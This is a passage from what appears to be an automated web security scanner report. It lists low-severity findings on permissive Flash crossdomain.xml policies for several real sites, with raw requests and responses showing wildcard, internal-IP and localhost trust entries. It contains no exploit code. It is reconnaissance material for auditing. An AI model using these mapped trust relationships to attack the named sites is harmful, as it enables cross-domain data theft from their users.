<allow-access-from domain="gp-stg.fry.com"/>
<allow-access-from domain="hv-stg.fry.com"/>
<allow-access-from domain="mm-stg.fry.com"/>
<allow-access-from domain="mv-stg.fry.com"/>
<allow-access-from domain="mw-stg.fry.com"/>
<allow-access-from domain="rt-stg.fry.com"/>
<allow-access-from domain="rc-stg.fry.com"/>
<allow-access-from domain="tf-stg.fry.com"/>
<allow-access-from domain="sc-stg.fry.com"/>
<allow-access-from domain="sa-stg.fry.com"/>
<allow-access-from domain="shopdeluxe-v9-dev.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="shopdeluxe-v9-uat.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="stage.coach.com"/>
<allow-access-from domain="*.coach.com"/>
<allow-access-from domain="demandware.edgesuite.net"/>
<allow-access-from domain="*.buildabear.com"/>
<allow-access-from domain="*.babwtest.com"/>
<allow-access-from domain="customshop.mesfire.com"/>
<allow-access-from domain="stage.homeinspiration.homedepot.com "/>
<allow-access-from domain="homeinspiration.homedepot.com"/>
<allow-access-from domain="pointroll.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.smartwool.com"/>
<allow-access-from domain="*.summitprojects.com"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="511.niteviewtech.com"/>
<allow-access-from domain="www.lauramercier.com"/>
<allow-access-from domain="*.lumberliquidators.com"/>
<allow-access-from domain="*.ae.com"/>
<allow-access-from domain="*.aezone.com"/>
<allow-access-from domain="s7everest.macromedia.com"/>
<allow-access-from domain="s7fuji.macromedia.com"/>
<allow-access-from domain="s7qa-is.macromedia.com"/>
<allow-access-from domain="officemax.companychecksandforms.com"/>
<allow-access-from domain="www.511deasbf.com"/>
<allow-access-from domain="*.511deasbf.com"/>
<allow-access-from domain="*.vcfcorp.com"/>
...[SNIP]...
<allow-access-from domain="*.asfurniture.com"/>
<allow-access-from domain="*.vcf.com"/>
...[SNIP]...
<allow-access-from domain="anthropologie.uat.venda.com"/>
<allow-access-from domain="anthropologie.live.venda.com"/>
<allow-access-from domain="*.511academy.com"/>
<allow-access-from domain="*.reedkrakoff.com"/>
<allow-access-from domain="stage.wearport.com"/>
<allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.anthropologie.eu"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="www.leadbased.com"/>
<allow-access-from domain="*.mxbi.com"/>
<allow-access-from domain="*.jordans.com"/>
<allow-access-from domain="jordans.com"/>
<allow-access-from domain="jordansqa.weymouthdesign.com"/>
<allow-access-from domain="*.mercury.com"/>
<allow-access-from domain="*.cb2.com"/>
<allow-access-from domain="*.landofnod.com"/>
<allow-access-from domain="*.crateandbarrel.com"/>
<allow-access-from domain="*.crateandbarrel.ca"/>
<allow-access-from domain="cim-dev.deluxe.com"/>
<allow-access-from domain="cim-qa.deluxe.com"/>
<allow-access-from domain="www.deluxe-check-order.com"/>
<allow-access-from domain="wwwpreprod.deluxe-check-order.com"/>
<allow-access-from domain="*.vfimagewear.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.zumiez.com"/>
<allow-access-from domain="zumiez.com"/>
<allow-access-from domain="*.vfc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="service-apps.scene7.com"/>
<allow-access-from domain="service-apps-staging.scene7.com"/>
<allow-access-from domain="walmart.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps-staging.scene7.com"/>
<allow-access-from domain="63.241.188.118"/>
<allow-access-from domain="63.241.188.119"/>
<allow-access-from domain="63.241.188.116"/>
<allow-access-from domain="63.241.188.120"/>
<allow-access-from domain="63.241.188.121"/>
<allow-access-from domain="63.241.188.117"/>
<allow-access-from domain="63.241.188.122"/>
<allow-access-from domain="63.241.188.123"/>
<allow-access-from domain="63.241.188.124"/>
<allow-access-from domain="63.241.188.125"/>
<allow-access-from domain="stage.store.americangirl.com"/>
<allow-access-from domain="*.kohls.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.kohls.com.edgesuite.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.edgeboss.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscorporation.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscareers.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlsoncampus.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.apiservice.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="98.129.79.154" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="httpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="rtmpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mixercast.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com"/>
<allow-access-from domain="*.enlighten.com"/>
<allow-access-from domain="*.hunterdouglas.com"/>
<allow-access-from domain=".allurent.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="64.52.70.13"/>
<allow-access-from domain="64.52.70.30"/>
<allow-access-from domain="64.52.70.33"/>
<allow-access-from domain="64.52.70.60"/>
<allow-access-from domain="76.12.61.174"/>
<allow-access-from domain="*.kmart.com"/>
<allow-access-from domain="skavamp.com"/>
<allow-access-from domain="*.skavamp.com"/>
<allow-access-from domain="*.cloudfront.net"/>
<allow-access-from domain="www.grandinroad.com"/>
<allow-access-from domain="www.frontgate.com"/>
<allow-access-from domain="97.65.222.116"/>
<allow-access-from domain="97.65.222.115"/>
<allow-access-from domain="*.neptune.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="*.web.rga.com"/>
<allow-access-from domain="*.ny.rga.com"/>
<allow-access-from domain="content01.nimblefish.com"/>
<allow-access-from domain="cdn.nimblefish.com"/>
<allow-access-from domain="media.nimblefish.com"/>
<allow-access-from domain="nv.nimblefish.com"/>
<allow-access-from domain="app.nimblefish.com"/>
<allow-access-from domain="media.beta01.nimblefish.com"/>
<allow-access-from domain="nv.beta01.nimblefish.com"/>
<allow-access-from domain="app.beta01.nimblefish.com"/>
<allow-access-from domain="media.content01.nimblefish.com"/>
<allow-access-from domain="nv.content01.nimblefish.com"/>
<allow-access-from domain="app.content01.nimblefish.com"/>
<allow-access-from domain="*.511fbileeda.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.hottopic.com"/>
<allow-access-from domain="*.teamworkathletic.com "/>
<allow-access-from domain="*.scene7.com"/>
<allow-access-from domain="*.shopvcf.com"/>
<allow-access-from domain="shopvcf.com"/>
<allow-access-from domain="*.axelscript.com"/>
<allow-access-from domain="*.sherwin.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sherwin-williams.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.resource.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.modea.com"/>
<allow-access-from domain="*.mizunousa.com"/>
<allow-access-from domain="*.mizunorunning.com"/>
<allow-access-from domain="*.mizunocda.com"/>
<allow-access-from domain="*.footjoy.com"/>
<allow-access-from domain="*.footjoy.co.uk"/>
<allow-access-from domain="*.footjoy.com.fr"/>
<allow-access-from domain="*.footjoy.de"/>
<allow-access-from domain="*.footjoy.se"/>
<allow-access-from domain="*.footjoy.ca"/>
<allow-access-from domain="*.footjoy.com.au"/>
<allow-access-from domain="*.footjoy.jp"/>
<allow-access-from domain="*.footjoy.co.th"/>
<allow-access-from domain="*.footjoy.com.my"/>
<allow-access-from domain="*.footjoy.com.sg"/>
<allow-access-from domain="*.footjoy.co.kr"/>
<allow-access-from domain="*.footjoy.com.cn"/>
<allow-access-from domain="pitchinteractive.com"/>
<allow-access-from domain="*.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="flashmaxx.com" secure="true" />
...[SNIP]...
<allow-access-from domain="searsfb.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ec2-184-72-166-175.compute-1.amazonaws.com"/>
<allow-access-from domain="*.getpapered.com"/>
<allow-access-from domain="*.englishpapercompany.com"/>
<allow-access-from domain="*.koolsquare.net"/>
<allow-access-from domain="*.target.com"/>
<allow-access-from domain="*.home.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cos.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.lvld.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cp.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.at" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.be" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ch" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.hu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.il" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.kr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.nz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.th" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ar" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.br" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.cn" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.co" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.hk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.mx" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.my" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pe" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ph" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.sg" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tw" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ve" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.de" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.dk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ee" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.es" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.gr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ie" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.it" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.lu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.no" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.pt" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.se" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brooksbrothers.com"/>
<allow-access-from domain="*.whitneyenglish.com"/>
<allow-access-from domain="canadiantire.ca"/>
<allow-access-from domain="*.maxnow.com"/>
<allow-access-from domain="4.59.112.158"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="*.converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cust.aops-eds.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="kobe.nike.jess3.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.highschoolsports.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skysports.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lequipe.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovation.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovationdev.digitas.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nikedev.framfab.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akqa.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ostkcdn.com"/>
<allow-access-from domain="*.aggregateknowledge.com"/>
<allow-access-from domain="*.nikedev.com"/>
<allow-access-from domain="anthrode.uat.venda.com"/>
<allow-access-from domain="anthropologie.custqa.venda.com"/>
<allow-access-from domain="*.fingerhut.com"/>
<allow-access-from domain="*.gettington.com"/>
...[SNIP]...

6.65. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Mon, 16 May 2011 10:43:05 GMT
Date: Mon, 16 May 2011 10:41:05 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.66. https://ordering.ftd.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ordering.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:10:00 GMT
Server: Apache
Set-Cookie: TLTSID=9AA032847F61107F002288ADA5203D48; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=9AA032847F61107F002288ADA5203D48; Path=/; Domain=.ftd.com; expires=Mon, 16-05-2021 02:10:00 GMT
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
ETag: "fb-4da5239d"
Accept-Ranges: bytes
Content-Length: 251
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ftd.com" />
<allow-access-from domain="*.ftdimg.com" />
...[SNIP]...

6.67. http://pet.imageg.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pet.imageg.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pet.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 08 May 2008 01:49:36 GMT
ETag: "53c78d-30d-44cae4b2b6c00"
X-UA-Compatible: IE=EmulateIE7
Content-Type: application/xml
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:49:57 GMT
Date: Mon, 16 May 2011 10:49:57 GMT
Content-Length: 781
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="172.20.1.172" />
<allow-access-from domain="172.21.1.172" />
<allow-access-from domain="206.16.220.172" />
<allow-access-from domain="63.240.110.172" />
<allow-access-from domain="preview.gsipartners.com" secure="true" />
...[SNIP]...

6.68. http://rya.rockyou.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rya.rockyou.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: rya.rockyou.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:38 GMT
Server: Apache/2.2
Last-Modified: Wed, 06 Apr 2011 23:33:16 GMT
ETag: "4ff-4a0486ac18700"
Accept-Ranges: bytes
Content-Length: 1279
Vary: Accept-Encoding,User-Agent
X-RyHeader: www114.rockyou.com took D=104 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*.rockmyspace.com" to-ports="*" />
<allow-access-from domain="*.rockyou.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rockmyspace.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rockyou.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.meebo.com" to-ports="*" />
<allow-access-from domain="*.rockyou-internal.com" to-ports="*" />
<allow-access-from domain="*.ministryofwar.com" to-ports="*"/>
<allow-access-from domain="api.msappspace.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.yimg.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="x.mochiads.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="www.mochiads.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="www.mochimedia.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn1.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn2.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn3.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn4.com" to-ports="*" />
...[SNIP]...

6.69. http://s7.orientaltrading.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://s7.orientaltrading.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: s7.orientaltrading.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"25343-1305036218000"
Last-Modified: Tue, 10 May 2011 14:03:38 GMT
Content-Type: application/xml
Content-Length: 25343
Expires: Mon, 16 May 2011 11:58:49 GMT
Date: Mon, 16 May 2011 01:58:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.laneventure.com"/>
<allow-access-from domain="*.pearsonco.com"/>
<allow-access-from domain="*.targetimg1.com"/>
<allow-access-from domain="*.targetimg2.com"/>
<allow-access-from domain="*.targetimg3.com"/>
<allow-access-from domain="*.agilent.com"/>
<allow-access-from domain="*.artvan.com"/>
<allow-access-from domain="*.mizunogolf.com"/>
<allow-access-from domain="*.talbots.com"/>
<allow-access-from domain="giftadvisor.indelible.tv"/>
<allow-access-from domain="*.taaz.com"/>
<allow-access-from domain="www.flashmaxx.com"/>
<allow-access-from domain="flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.armstrong.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="sassomedia.com"/>
<allow-access-from domain="*.photoshop.com"/>
<allow-access-from domain="kijones.host.adobe.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="*.trex.com"/>
<allow-access-from domain="*.trexco.com"/>
<allow-access-from domain="*.vermontcountrystore.com"/>
<allow-access-from domain="*.pabng.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.k2admin.com"/>
<allow-access-from domain="*.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.shopdeluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.nimblefish.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fossil.com"/>
<allow-access-from domain="www.michele.com"/>
<allow-access-from domain="127.0.0.1" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.polarisindustries.com"/>
<allow-access-from domain="backstage.polarisindustries.com"/>
<allow-access-from domain="s7diod-isorigin.scene7.com"/>
<allow-access-from domain="origin-na1.scene7.com"/>
<allow-access-from domain="origin-na2.scene7.com"/>
<allow-access-from domain="origin-na3.scene7.com"/>
<allow-access-from domain="origin-na4.scene7.com"/>
<allow-access-from domain="origin-na5.scene7.com"/>
<allow-access-from domain="origin-na6.scene7.com"/>
<allow-access-from domain="origin-na7.scene7.com"/>
<allow-access-from domain="origin-na8.scene7.com"/>
<allow-access-from domain="s7d1.scene7.com"/>
<allow-access-from domain="s7d2.scene7.com"/>
<allow-access-from domain="s7d3.scene7.com"/>
<allow-access-from domain="s7d4.scene7.com"/>
<allow-access-from domain="s7ondemand1.scene7.com"/>
<allow-access-from domain="irtex1.scene7.com"/>
<allow-access-from domain="10.80.1.144"/>
<allow-access-from domain="10.80.1.152"/>
<allow-access-from domain="10.80.1.42"/>
<allow-access-from domain="origin-apps.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps.scene7.com"/>
<allow-access-from domain="isstaging.scene7.com"/>
<allow-access-from domain="techservices.scene7.com"/>
<allow-access-from domain="ecomtest1.hancockms.com"/>
<allow-access-from domain="www.hancockfabrics.com"/>
<allow-access-from domain="www.eddiebauer.com"/>
<allow-access-from domain="dev.eddiebauer.com"/>
<allow-access-from domain="qa.eddiebauer.com"/>
<allow-access-from domain="testvipd1.scene7.com"/>
<allow-access-from domain="testvipd2.scene7.com"/>
<allow-access-from domain="testvipd3.scene7.com"/>
<allow-access-from domain="testvipd4.scene7.com"/>
<allow-access-from domain="s7ondemand3.scene7.com"/>
<allow-access-from domain="s7ondemand7.scene7.com"/>
<allow-access-from domain="s7ips1.scene7.com"/>
<allow-access-from domain="s7ondemand5.scene7.com"/>
<allow-access-from domain="*.sample.scene7.com"/>
<allow-access-from domain="origin-search.scene7.com"/>
<allow-access-from domain="staging.scene7.com"/>
<allow-access-from domain="s7testis.adobe.com"/>
<allow-access-from domain="sportstown.crosscomm.net"/>
<allow-access-from domain="sportstown.com"/>
<allow-access-from domain="*.sportstown.com"/>
<allow-access-from domain="www.anthropologie.com"/>
<allow-access-from domain="staging.anthropologie.us"/>
<allow-access-from domain="smartwool.dev.summitprojects.com"/>
<allow-access-from domain="smartwool.stage.summitprojects.com"/>
<allow-access-from domain="www.smartwool.com"/>
<allow-access-from domain="s7d5.scene7.com"/>
<allow-access-from domain="testvipd5.scene7.com"/>
<allow-access-from domain="www.roadrunnersports.com"/>
<allow-access-from domain="dev.atgnow.com"/>
<allow-access-from domain="staging.roadrunnersports.com"/>
<allow-access-from domain="*.sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain=" s7.sears.com "/>
<allow-access-from domain="*.myctmh.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.instrum3nt.com"/>
<allow-access-from domain="*.tommybahama.com"/>
<allow-access-from domain="demo.ml.nurun.com"/>
<allow-access-from domain="trek07.hansondodge.com"/>
<allow-access-from domain="*.dexdealer.com" />
<allow-access-from domain="*.bontrager.com" />
<allow-access-from domain="*.trekbikes.com" />
<allow-access-from domain="*.readyfortheroadahead.com" />
<allow-access-from domain="*.belk.com"/>
<allow-access-from domain="*.sears.com"/>
<allow-access-from domain="*.dayport.com"/>
<allow-access-from domain="eaqa2prod1234.ethanallen.com"/>
<allow-access-from domain="devaws.ethanallen.com"/>
<allow-access-from domain="elm.kharv.com"/>
<allow-access-from domain="serotoninsoftware.com"/>
<allow-access-from domain="*.ethanallen.com"/>
<allow-access-from domain="*.wishbook.com"/>
<allow-access-from domain="*.entriq.net"/>
<allow-access-from domain="test-web1-www.lbiatlanta.com"/>
<allow-access-from domain="*.newellco.com"/>
<allow-access-from domain="preview.graco.com"/>
<allow-access-from domain="*.gracobaby.com"/>
<allow-access-from domain="s.sears.com"/>
<allow-access-from domain="202.44.56.2"/>
<allow-access-from domain="202.44.58.2"/>
<allow-access-from domain="beta.graco.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.ashleyfurniture.com" />
<allow-access-from domain="*.ashleyfurniturehomestore.com" />
<allow-access-from domain="s7sps1-staging.scene7.com" />
<allow-access-from domain="s7sps1.scene7.com" />
<allow-access-from domain="*.lokion.com"/>
<allow-access-from domain="*.vikingrange.com"/>
<allow-access-from domain="www.armstrong.com"/>
<allow-access-from domain="*.classscene.com"/>
<allow-access-from domain="*.classsceneqa.com"/>
<allow-access-from domain="*.classscenedemo.com"/>
<allow-access-from domain="*.fulltiltboots.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.karhuskico.com"/>
<allow-access-from domain="*.k2women.com"/>
<allow-access-from domain="*.k2snowboarding.com"/>
<allow-access-from domain="*.k2skis.com"/>
